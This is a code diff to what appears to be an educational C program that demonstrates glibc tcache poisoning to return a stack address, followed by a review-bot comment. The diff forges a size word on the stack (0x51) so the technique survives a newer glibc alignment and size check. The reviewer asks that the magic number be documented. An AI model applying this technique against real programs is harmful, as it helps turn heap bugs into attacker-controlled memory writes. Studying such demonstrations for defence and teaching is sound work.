@@ -16,6 +16,8 @@ int main(){
1616 printf ("After the patch https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41,\n"
1717 "An heap address leak is needed to perform this attack.\n"
1818 "The same patch also ensures the chunk returned by tcache is properly aligned.\n\n" );
19+ printf ("After the patch https://patchwork.sourceware.org/project/glibc/patch/20250206213709.2394624-2-benjamin.p.kallus.gr@dartmouth.edu/,\n"
20+ "We need to control at least 8 byte before the region we want to allocate to (to forge the size).\n\n" );
1921
2022 // Allocate 14 times so that we can free later.
2123 char * ptrs [14 ];
@@ -50,7 +52,8 @@ int main(){
5052 // Create an array on the stack and initialize it with garbage.
5153 size_t stack_var [6 ];
5254 memset (stack_var , 0xcd , sizeof (stack_var ));
53-
55+ stack_var [1 ] = 0x51 ;
56+
5457 printf ("The stack address that we intend to target: %p\n"
5558 "It's current value is %p\n" , & stack_var [2 ], (char * )stack_var [2 ]);
5659
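Review bot: The added `stack_var[1] = 0x51;` in the second hunk is an unexplained magic number, and the comment above it still says the array is only initialized with garbage, which is no longer true for slot 1. Going by the message added in the first hunk, this word is presumably the size field that the patched glibc reads immediately before `&stack_var[2]`, so the line should say so, e.g. `// Size word glibc now validates before the target; presumably the chunk size of the allocations above | PREV_INUSE (confirm against the malloc size).` The allocation size itself is set elsewhere in main, outside both hunks; if it is a named constant, deriving this value from it would keep the two from drifting apart. In the first hunk, the new message hard-codes "8 byte", which reads as sizeof(size_t) on a 64-bit target. It also cites a patchwork submission rather than a commit as the message above it does, so a reader cannot tell which glibc release carries the check.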